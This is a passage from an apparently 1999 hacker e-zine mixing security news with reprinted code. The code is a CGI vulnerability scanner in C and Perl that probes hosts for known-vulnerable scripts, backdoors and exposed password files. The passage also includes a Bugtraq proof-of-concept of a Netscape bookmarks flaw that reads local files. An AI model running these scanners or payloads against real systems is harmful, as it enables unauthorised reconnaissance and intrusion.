than dead ends. The call was made to Omaha police headquarters Thursday night: a bomb threat. With caller I-D on police phones, the name and address of the alleged caller was quickly discovered Police made their way to a northwest Omaha home. Officer Don Savage says, "When they arrived,there they met a young man who said he had a feeling that the police would be coming to his house that night." The young man had received an anonymous message on his computer telling him to expect a visit from the police. While investigators were questioning the young man at his home, another call came in at police headquarters from the same number and address. Savage says, "911 contacted the sergeant on the scene at this house and asked 'is this the house?' And the sergeant confirmed no one had made a phone call from that house. Carla Ewert with U.S. West says, "There are some technical pieces of equipment that are available if someone's going to use the phone lines dishonestly. And they technically could tap into someone's phone line from outside the house, never have to be in the person's home." Ewart says it's virtually impossible for someone to use their computer to call in a threat from someone else's phone line. She says the connection between voice and data are separated. Right now police aren't sure what the computer connection is, or how the scheme was carried out. But a threat to their own house won't go unpunished. Channel six news talked to the family who's phone line has been used in this scheme. They are also baffled as to how their phone line was tapped. Police say they intend to stay on the case until an arrest is made. @HWA 12.0 UK Labels Windows as 'secure' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ UK Labels Windows as Secure contributed by toka25 The U.K. Information Technology Security Evaluation Criteria (ITSEC), must have been hit on the head, dropped at birth, or be taking some really good drugs. Why? They have awarded Windows NT Server 4.0 and Windows NT Workstation 4.0 an E3/FC-2 rating. Microsoft says that this is "the highest security evaluation possible for a general-purpose operating system". Either this is all Microsoft spin or the testers have never heard about things like pwdump or L0phtCrack. Microsoft Propaganda http://www.microsoft.com/windows/dailynews/042999.htm April 29, 1999 U.K. government evaluation confirms security of Microsoft Windows NT 4.0 platform Windows NT platform receives high security evaluation London—The British government this week concluded that the Microsoft® Windows NT® platform passes muster when it comes to security. After more than a year of intensive testing, the U.K. Information Technology Security Evaluation Criteria (ITSEC) certification board has awarded Windows NT Server 4.0 and Windows NT Workstation 4.0 an E3/FC-2 rating—generally acknowledged as the highest security evaluation possible for a general-purpose operating system. The security standards agency evaluation included examinations of the source code and design documentation of Windows NT 4.0 with Service Pack 3. Testers also had direct access to the engineers who designed and tested the server operating system. Their conclusion: the Windows NT 4.0 architecture provides robust but flexible security. "The successful ITSEC evaluation confirms the robust security and design of Windows NT," said Edmund Muth, group product manager at Microsoft. "The strong security and wide range of security-related features in Windows NT benefit customers—both those in industries where security is a paramount concern, like banking, government, healthcare and the military—and individuals who are concerned about their privacy and e-commerce." The comprehensive security architecture in the Windows NT platform provides that level of safety. Its integrated security features include strong authentication, fine-grained access control, real-world auditing tools and secure communications. Governments and enterprises around the world have already put those features to use. Last Fall, Brazil used a Windows NT-based network to securely host the largest electronic elections in history. Requiring the highest level of security, nearly 90 percent of NATO's headquarters and field sites in Europe and the United States use a Windows NT-based system to deliver tactical data and military messaging. And in the private sector, one of New Zealand's largest banks counts on Windows NT to provide secure banking over the Internet. The ITSEC rating provides independent confirmation of the platform's security features. ITSEC is the only evaluation scheme recognized by the British government for use in secure and sensitive installations. It is also officially recognized by the governments of many European Union countries, Canada, the former Soviet republics and, with slight variations, in New Zealand and Australia. The E3/F-C2 evaluation is roughly equivalent to a C2 evaluation under the U.S. Trusted Computer Security Evaluation Criteria (TCSEC) regime, better known as the "Orange Book." Microsoft is separately pursuing a C2 evaluation for Windows NT 4.0, which is expected to be completed shortly. But security isn't the only thing this platform offers. The multipurpose server operating system that forms the foundation of the BackOffice® family, Windows NT Server 4.0 offers a comprehensive set of services. From communications and file and print services to a platform for building and hosting Web- and client-server-based applications, Windows NT Server is built to meet the many needs of business. Windows NT Workstation 4.0, developed specifically for the business environment, makes it easy to use, manage and integrate those features. The operating system gives employees the intuitive look and feel of Windows® 98, so companies can cut training costs, and people can work productively right from the start. The Windows NT platform is also the quickest path to Windows 2000, which is designed to be Microsoft's most robust and reliable operating system to date. Windows 2000 is also designed with security in mind. Microsoft is taking orders for the Beta 3 versions of Windows 2000 Server and Workstation. After Microsoft releases Windows 2000, the company plans to submit the operating system for a similar security evaluation under the Common Criteria, a new evaluation system that will consolidate the TCSEC and ITSEC criteria. The results of which could further the Windows platform's reputation of providing secure computing. @HWA 13.0 Yugoslavia to stay plugged in ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Yugoslavia to Stay Online contributed by Code Kid After all the confusion of whether companies should or should not pull the plug on Yugoslavia the Clinton administration has promised not to unplug the region from the rest of the net. Wired http://http://www.wired.com/news/news/politics/story/19697.html 14.0 VISA Releases Draft Protection Profile ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Kingpin According to Schneier's Crypto-Gram Visa has issued a draft of the "Visa Smart Card Protection Profile," as part of the Common Criteria. It contains a very nice list of smart card attacks. The document is a draft, and they want comments. Visa Smart Card Protection Profile http://www.visa.com/nt/chip/accept.html (you must agree to a disclaimer before being allowed to dl this pdf document) The Visa document references the Common Criteria: Common Criteria http://csrc.ncsl.nist.gov/cc/ 15.0 cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* ---------------------------------------------------------------------- */ /* CGI scanner v1.35, m0dify and recode by su1d sh3ll //UnlG 1999 */ /* Tested on Slackware linux with kernel 2.0.35;RH 5.2(2.0.36); */ /* FreeBSD 2.2.2-3.1;IRIX 5.3 */ /* Source c0de by [CKS & Fdisk] */ /* gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/ /* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */ /* hypoclear of lUSt,codex ;-) , K.A.L.U.G. */ /* fuck to: www.hackzone.ru , HDT... CHC fuck u 2 , llamaz */ /* NATO and bill klinton <---- double fuck! :-) huh */ /* c0ming s00n: add-on for CGI scanner - for scan "C" class subnet & logs */ /* -----------------------------------------------[10:01 17.05.99 UnlG]- */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void main(int argc, char *argv[]) { int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin,suxes=0; char cgibuff[1024]; char *buff[100]; /* Don't u think 100 is enought? ;-)*/ char *cginame[100]; /* Don't u think 100 is enought? */ buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; /* v0rt-fu when u modify source, check this first line.... that's my 8-) */ buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n"; buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n"; buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n"; buff[7] = "GET /cgi-bin/nph-publish HTTP/1.0\n\n"; buff[8] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n"; buff[9] = "GET /cgi-bin/handler HTTP/1.0\n\n"; buff[10] = "GET /cgi-bin/webgais HTTP/1.0\n\n"; buff[11] = "GET /cgi-bin/websendmail HTTP/1.0\n\n"; buff[12] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n"; buff[13] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n"; buff[14] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n"; buff[15] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n"; buff[16] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n"; buff[17] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n"; buff[18] = "GET /cgi-bin/www-sql HTTP/1.0\n\n"; buff[19] = "GET /cgi-bin/view-source HTTP/1.0\n\n"; buff[20] = "GET /cgi-bin/campas HTTP/1.0\n\n"; buff[21] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n"; buff[22] = "GET /cgi-bin/glimpse HTTP/1.0\n\n"; buff[23] = "GET /cgi-bin/man.sh HTTP/1.0\n\n"; buff[24] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n"; buff[25] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n"; buff[26] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n"; buff[27] = "GET /cgi-bin/jj HTTP/1.0\n\n"; buff[28] = "GET /cgi-bin/info2www HTTP/1.0\n\n"; buff[29] = "GET /cgi-bin/files.pl HTTP/1.0\n\n"; buff[30] = "GET /cgi-bin/finger HTTP/1.0\n\n"; buff[31] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n"; buff[32] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n"; buff[33] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n"; buff[34] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n"; buff[35] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n"; buff[36] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n"; buff[37] = "GET /cgi-bin/wrap HTTP/1.0\n\n"; buff[38] = "GET /cgi-bin/cgiwrap HTTP/1.0\n\n"; buff[39] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n"; buff[40] = "GET /cgi-bin/edit.pl HTTP/1.0\n\n"; buff[41] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n"; buff[42] = "GET /_vti_inf.html HTTP/1.0\n\n"; buff[43] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n"; buff[44] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n"; buff[45] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n"; buff[46] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n"; buff[47] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n"; buff[48] = "GET /_vti_bin/shtml.exe HTTP/1.0\n\n"; buff[49] = "GET /cgi-dos/args.bat HTTP/1.0\n\n"; buff[50] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n"; buff[51] = "GET /cgi-bin/rguest.exe HTTP/1.0\n\n"; buff[52] = "GET /cgi-bin/wguest.exe HTTP/1.0\n\n"; buff[53] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n"; buff[54] = "GET /scripts/CGImail.exe HTTP/1.0\n\n"; buff[55] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n"; buff[56] = "GET /scripts/fpcount.exe HTTP/1.0\n\n"; buff[57] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n"; buff[58] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n"; buff[59] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n"; buff[60] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n"; buff[61] = "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n"; buff[62] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n"; buff[63] = "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n"; buff[64] = "GET /search97.vts HTTP/1.0\n\n"; buff[65] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi , rule? ;-) */ cginame[1] = "UnlG - backd00r "; cginame[2] = "THC - backd00r "; cginame[3] = "phf..classic :) "; cginame[4] = "Count.cgi "; cginame[5] = "test-cgi "; cginame[6] = "nph-test-cgi "; cginame[7] = "nph-publish "; cginame[8] = "php.cgi "; cginame[9] = "handler "; cginame[10] = "webgais "; cginame[11] = "websendmail "; cginame[12] = "webdist.cgi "; cginame[13] = "faxsurvey "; cginame[14] = "htmlscript "; cginame[15] = "pfdisplay "; cginame[16] = "perl.exe "; cginame[17] = "wwwboard.pl "; cginame[18] = "www-sql "; cginame[19] = "view-source "; cginame[20] = "campas "; cginame[21] = "aglimpse "; cginame[22] = "glimpse "; cginame[23] = "man.sh "; cginame[24] = "AT-admin.cgi "; cginame[25] = "filemail.pl "; cginame[26] = "maillist.pl "; cginame[27] = "jj "; cginame[28] = "info2www "; cginame[29] = "files.pl "; cginame[30] = "finger "; cginame[31] = "bnbform.cgi "; cginame[32] = "survey.cgi "; cginame[33] = "AnyForm2 "; cginame[34] = "textcounter.pl "; cginame[35] = "classifields.cgi"; cginame[36] = "environ.cgi "; cginame[37] = "wrap "; cginame[38] = "cgiwrap "; cginame[39] = "guestbook.cgi "; cginame[40] = "edit.pl "; cginame[41] = "perlshop.cgi "; cginame[42] = "_vti_inf.html "; cginame[43] = "service.pwd "; cginame[44] = "users.pwd "; cginame[45] = "authors.pwd "; cginame[46] = "administrators "; cginame[47] = "shtml.dll "; cginame[48] = "shtml.exe "; cginame[49] = "args.bat "; cginame[50] = "uploader.exe "; cginame[51] = "rguest.exe "; cginame[52] = "wguest.exe "; cginame[53] = "bdir - samples "; cginame[54] = "CGImail.exe "; cginame[55] = "newdsn.exe "; cginame[56] = "fpcount.exe "; cginame[57] = "openfile.cfm "; cginame[58] = "exprcalc.cfm "; cginame[59] = "dispopenedfile "; cginame[60] = "sendmail.cfm "; cginame[61] = "codebrws.asp "; cginame[62] = "codebrws.asp 2 "; cginame[63] = "showcode.asp "; cginame[64] = "search97.vts "; cginame[65] = "carbo.dll "; if (argc<2) { printf("\n [-- CGI Checker 1.35. Modified by su1d sh3ll //UnlG --]"); printf("\nusage : %s host ",argv[0]); printf("\n Or : %s host -d for debug mode\n\n",argv[0]); exit(0); } if (argc>2) { if(strstr("-d",argv[2])) { debugm=1; } } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll //UnlG\n\n\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); /* <--- if u want scan another port change it */ /* codex when u again change this code pls call proggi like this 1.35.1 or 1.35.[a..z] ;-) */ if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("\n\n\t [ Press any key to check out the httpd version...... ]\n"); getchar(); /* CKS sorry, but ur new piece of code don't work :-( */ send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); printf("%s",buffer); close(sock); printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n"); getchar(); while(count++ < 65) /* huh! 65 cgi..... no secur1ty in th1s w0rld ;-)*/ { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("Searching for %s : ",cginame[count]); for(numin=0;numin < 1024;numin++) { cgibuff[numin] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock, cgibuff, sizeof(cgibuff),0); cgistr = strstr(cgibuff,foundmsg); if( cgistr != NULL) { printf("Found !! ;)\n");++suxes; } else printf("Not Found\n"); if(debugm==1) { printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff); printf("Press any key to continue....\n"); getchar(); } close(sock); } if (suxes){ printf("...have a nice hack... ;-)\n");} else {printf ("...n0thing wr0ng on server..... hmm...sucks!\n");} } @HWA 15.1 cgichk.pl PERL version of the above cgi scanner from Wiltered Fire ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl ############################################## # # # CGI scanner in perl # # Written By: Epicurus (epicurus@wilter.com) # # # # Based on a C version by su1d sh3ll # # # ############################################## use Socket; @cgi_scripts = ("GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n","GET /cgi-bin/phf HTTP/1.0\n\n", "GET /cgi-bin/Count.cgi HTTP/1.0\n\n","GET /cgi-bin/test-cgi HTTP/1.0\n\n", "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n","GET /cgi-bin/nph-publish HTTP/1.0\n\n", "GET /cgi-bin/php.cgi HTTP/1.0\n\n","GET /cgi-bin/handler HTTP/1.0\n\n", "GET /cgi-bin/webgais HTTP/1.0\n\n","GET /cgi-bin/websendmail HTTP/1.0\n\n", "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n","GET /cgi-bin/faxsurvey HTTP/1.0\n\n", "GET /cgi-bin/htmlscript HTTP/1.0\n\n","GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n", "GET /cgi-bin/perl.exe HTTP/1.0\n\n","GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n", "GET /cgi-bin/www-sql HTTP/1.0\n\n","GET /cgi-bin/view-source HTTP/1.0\n\n", "GET /cgi-bin/campas HTTP/1.0\n\n","GET /cgi-bin/aglimpse HTTP/1.0\n\n", "GET /cgi-bin/glimpse HTTP/1.0\n\n","GET /cgi-bin/man.sh HTTP/1.0\n\n", "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n","GET /cgi-bin/filemail.pl HTTP/1.0\n\n", "GET /cgi-bin/maillist.pl HTTP/1.0\n\n","GET /cgi-bin/jj HTTP/1.0\n\n", "GET /cgi-bin/info2www HTTP/1.0\n\n","GET /cgi-bin/files.pl HTTP/1.0\n\n", "GET /cgi-bin/finger HTTP/1.0\n\n","GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n", "GET /cgi-bin/survey.cgi HTTP/1.0\n\n","GET /cgi-bin/AnyForm2 HTTP/1.0\n\n", "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n","GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n", "GET /cgi-bin/environ.cgi HTTP/1.0\n\n","GET /cgi-bin/wrap HTTP/1.0\n\n", "GET /cgi-bin/cgiwrap HTTP/1.0\n\n","GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n", "GET /cgi-bin/edit.pl HTTP/1.0\n\n","GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n", "GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n", "GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n", "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n", "GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n", "GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n", "GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n", "GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n", "GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n", "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n", "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n", "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n", "GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n"); @cgi_names = ("THC - backdoor ","phf ","Count.cgi ","test-cgi ","nph-test-cgi ", "nph-publish ","php.cgi ","handler ","webgais ","websendmail ", "webdist.cgi ","faxsurvey ","htmlscript ","pfdisplay ","perl.exe ", "wwwboard.pl ","www-sql ","view-source ","campas ","aglimpse ", "glimpse ","man.sh ","AT-admin.cgi ","filemail.pl ","maillist.pl ", "jj ","info2www ","files.pl ","finger ","bnbform.cgi ", "survey.cgi ","AnyForm2 ","textcounter.pl ","classifields.cgi","environ.cgi ", "wrap ","cgiwrap ","guestbook.cgi ","edit.pl ","perlshop.cgi ", "_vti_inf.html ","service.pwd ","users.pwd ","authors.pwd ","administrators ", "shtml.dll ","shtml.exe ","args.bat ","uploader.exe ","rguest.exe ", "wguest.exe ","bdir - samples ","CGImail.exe ","newdsn.exe ","fpcount.exe ", "openfile.cfm ","exprcalc.cfm ","dispopenedfile ","sendmail.cfm ","codebrws.asp ", "codebrws.asp 2 ","showcode.asp ","search97.vts ","carbo.dll "); print "CGI scanner [in Perl] v1.0\n\n"; print "Host: "; chomp($remote=); print "HTTP Port [80]: "; chomp($port=); if($port eq "") { $port=80; } print "Log Session?(y/n)"; $yn=; if($yn =~ /y/i) { $log = 1; $logfile="$remote".".scan"; print "Log File [$logfile]: "; $file=; chop($file) if $file =~ /\n$/; if($file ne "") { $logfile=$file; } open(LOG,">>$logfile") || die("Unable to write to $logfile!"); print LOG "Scanning $remote port $port\n\n"; } print "Press [enter] to check the httpd version...\n"; $blah=; $submit = "HEAD / HTTP/1.0\r\n\r\n"; if($port =~ /\D/) { $port = getservbyname($port, 'tcp') } &error("No port specified.") unless $port; $iaddr = inet_aton($remote) || &error("Failed to find host: $remote"); $paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!"); $proto = getprotobyname('tcp') || &error("Unable to get protocall!"); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!"); connect(SOCK, $paddr) || &error("Unable to connect: $!"); send(SOCK,$submit,0); while() { print $_; print LOG $_ if $log==1; } close(SOCK); print "Press [enter] to check for CGI vulnerabilities...\n"; $blah=; $i=0; foreach $cgi_script(@cgi_scripts) { print "Searching for @cgi_names[$i] : "; print LOG "Searching for @cgi_names[$i] : " if $log==1; $submit=$cgi_script; &connect_n_check; $i++; } if($bad_security>0) { print "Server may have CGI vulnerabilities.\n"; print LOG "Server may have CGI vulnerabilities.\n\n" if $log==1; } else { print "No known CGI vulnerabilities found.\n"; print LOG "No known CGI vulnerabilities found.\n\n" if $log==1; } close(LOG) if $log==1; exit; sub connect_n_check { if($port =~ /\D/) { $port = getservbyname($port, 'tcp') } &error("No port specified.") unless $port; $iaddr = inet_aton($remote) || &error("Failed to find host: $remote"); $paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!"); $proto = getprotobyname('tcp') || &error("Unable to get protocall!"); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!"); connect(SOCK, $paddr) || &error("Unable to connect: $!"); send(SOCK,$submit,0); $check=; ($http,$code,$blah) = split(/ /,$check); if($code == 200) { print "Found!\n"; print LOG "Found!\n" if $log==1; $bad_security++; } else { print "Not Found\n"; print LOG "Not Found\n" if $log==1; } close(SOCK); } sub error { $error = shift(@_); print "Error - $error\n"; print LOG "Error - $error\n\n" if $log==1; close(LOG) if $log==1; exit; } @HWA 16.0 Vulnerability in Netscape bookmarks found by George Guninski... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sun, 16 May 1999 17:17:34 +0300 From: Georgi Guninski To: BUGTRAQ@netspace.org Subject: Netscape Communicator bookmarks security vulnerability There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks with JavaScript code in the title. If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE> tag and bookmark that page, the JavaScript code is written in the local bookmarks file. Then when the bookmarks file is open, the JavaScript code is executed in the security context of a local file - the bookmarks file. The bookmarks file may be open by a script, probably a server redirect or by the user. The bookmarks file name must be known, but it is easily guessed for most dialup users. Vulnerabilities: reading user's bookmarks, browsing local directories, reading local files (works fine on Linux, probably possible on Windows). Workaround: Disable JavaScript or do not bookmark untrusted pages. Demonstration is available at: http://www.nat.bg/~joro/book2.html See attached file for the source. Georgi Guninski http://www.nat.bg/~joro http://www.whitehats.com/guninski -------------------------------------------------------------------------- <http://www.nat.bg/~joro/book2.html> <HTML><HEAD> <TITLE> <SCRIPT> alert('Bookmarks got control'); s='Here are some bookmarks: \n'; for(i=1;i<7;i++) s += document.links[i]+'\n'; alert(s); dirToRead='wysiwyg://2/file://c:/'; a=window.open(dirToRead); s='Here are some files in C:\\ :\n'; for(i=1;i<7;i++) s += a.document.links[i]+'\n'; a.close(); alert(s); </SCRIPT> There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks with Javascript code in the title.
If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE> tag and bookmark that page, the JavaScript code is written in the local bookmarks file. Then when the bookmarks file is open, the JavaScript code is executed in the security context of a local file. The bookmarks file may be open by a script, probably a server redirect or by the user. The bookmarks file name must be known - easily guessed for most dialup users.

Vulnerability: reading user's bookmarks, browsing local directories, reading local files (works fine on Linux, probably possible on Windows).
Workaround: Disable JavaScript or do not bookmark untrusted pages.



To test it:
1) Bookmark this page.
2) Close all NC windows and restart NC.
3) Open bookmarks file (change the filename in the field below if needed and click "Open bookmarks", or use File| Open Page... )

Enter the file name of your bookmarks file:
Open bookmarks
Go to Georgi Guninski's home page @HWA 17.0 Lotus Notes in bed with the NSA on encryption keys ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (From Packet Storm Security http://www.genocide2600.com/~tattooman/new.shtml) http://www.wired.com/news/print_version/politics/story/19602.html?wnpg=all Spying on the Spies by Niall McKay 12:15 p.m. 10.May.99.PDT The National Security Agency has its ear to the world, but doesn't listen to everyone at once. That was one conclusion of a new report, Interception Capabilities 2000, accepted late last week by the European Parliament's Science and Technology Options Assessment Panel (STOA). The panel commissioned Duncan Campbell, a British investigative reporter, to prepare a report on Echelon, the US-led satellite surveillance network. "I have no objection to these systems monitoring serious criminals and terrorists," said Glyn Ford, a British Labour Party member of parliament and a committee member of STOA. "But what is missing here is accountability, clear guidelines as to who they can listen to, and in what circumstances these laws apply." Campbell was asked to investigate the system in the wake of charges made last year in the European Parliament that Echelon was being used to funnel European government and industry secrets into US hands. "What is new and important about this report is that it contains the first ever documentary evidence of the Echelon system," said Campbell. Campbell obtained the document from a source at Menwith Hill, the principal NSA communications monitoring station, located near Harrogate in northern England. The report details how intelligence agencies intercept Internet traffic and digital communications, and includes screen shots of traffic analysis from NSA computer systems. Interception Capabilities 2000 also provides an account of a previously unknown, secret international organization led by the FBI. According to Campbell, the "secret" organization, called ILETS (International Law Enforcement Telecommunications Seminar), is working on building backdoor wiretap capabilities into all forms of modern communications, including satellite communications systems. "[The report] is undoubtedly the most comprehensive look at Echelon to date because of its attention to detail -- [and] the NSA's use of technology," said John Young, a privacy activist in New York. Although the United States has never officially acknowledged Echelon's existence, dozens of investigative reports over the past decade have revealed a maze-like system that can intercept telephone, data, cellular, fax, and email transmissions sent anywhere in the world. Previously, Echelon computers were thought to be able to scan millions of telephone lines and faxes for keywords such as "bomb" and "terrorist." But Campbell's report maintains that the technologies to perform such a global dragnet do not exist. Instead, Campbell said that the system targets the communications networks of known diplomats, criminals, and industrialists of interest to the intelligence community. The report charges that popular software programs such as Lotus Notes and Web browsers include a "back door," through which the NSA can gain access to an individual's personal information. Citing a November 1997 story in the Swedish newspaper, Svenska Dagbladet, the report said that "Lotus built in an NSA 'help information' trapdoor to its Notes system, as the Swedish government discovered to its embarrassment." The report goes on to describe a feature called a "workfactor reduction field" that is built into Notes and incorporated into all email sent by non-US users of the system. The feature reportedly broadcasts 24 of the 64 bits of the key used for each communication, and relies on a public key that can only be read by the NSA. Lotus could not be reached for comment. The new report emerges as politicians on both sides of the Atlantic are growing increasingly concerned about Echelon and its capabilities. "I believe that it's time that there is some congressional scrutiny of the Echelon project and I am examining a way to do that," said Representative Bob Barr (R-Georgia). "I understand the need for secrecy -- I was with the CIA myself -- but Echelon has raised some questions about fundamental policy and constitutional rights." Barr is concerned that the NSA is using its Echelon partners to help it sidestep laws that forbid the US government from spying on its own people. So far, there has been very little scrutiny of spy systems in the United States, according to Patrick Poole, a privacy advocate and lecturer in government and economics at Bannock Burn College in Franklin, Tennessee. "The only significant examination of spy systems in the United States was the Church Report, which was prompted by Watergate in the early '70s," said Poole. "I hope that Europe's interest in the Echelon system will spark some new debate in the US." Echelon is believed to be principally operated by the NSA and its British counterpart, the Government Communications Headquarters. The system also reportedly relies on agreements with similar agencies in other countries, including Canada's Communications Security Establishment, Australia's Defense Signals Directorate, and New Zealand's Government Communications Security Bureau. (From Packet Storm Security http://www.genocide2600.com/~tattooman/new.shtml) Hello, 1st off please don't publish my name on your site. I'm too lazy to set up another cheezy mail acct. Today I downloaded cryptography/nsa/lotus.notes.backdoor.txt from your site. I have a close friend who is a developer for Iris (the people who make Notes for lotus.) I sent him the file I downloaded and asked him what the deal was, and here's his response: Here's the necessary info to truly understand the issue here; a speech by Ray Ozzie and Charlie Kaufman's white paper on the topic. What it comes down to is that notes provides superior exportable encryption technology when compared to other US products on the market. For anyone (but the NSA) to crack our international encryption keys they must crack a 64 bit key, the same as with a US encryption key. In the international version we take 24 of the 64 bit encryption key and encrypt the 24 bits with the NSA's public key and send it, encrypted strongly, along with the encrypted message. This means the NSA can decrypt with their key and have 24 of the 64 bit key. They still have to break the remaining 40 bits. 40 bit key encryption has been the max for exportable encryption and that is what all other US exportable encryption providers allow. That limit has just been raised to 56 bits and we are incorporating that as I type. In the worst case: the NSA's private key is compromised, the 40 bit portion of the key still must be cracked. So we haven't weakened the security of international encryption, but actually made it equal to the US security (to everyone but the NSA). We are proud of this arrangement because we have found a way to make Notes as secure as the US government will allow for our international customers. If we hadn't used this technique all of the international notes encrypted data would be with only a 40 bit key. As it stands, the 64 bit key used in both US and international encryption is extremely secure. It's too 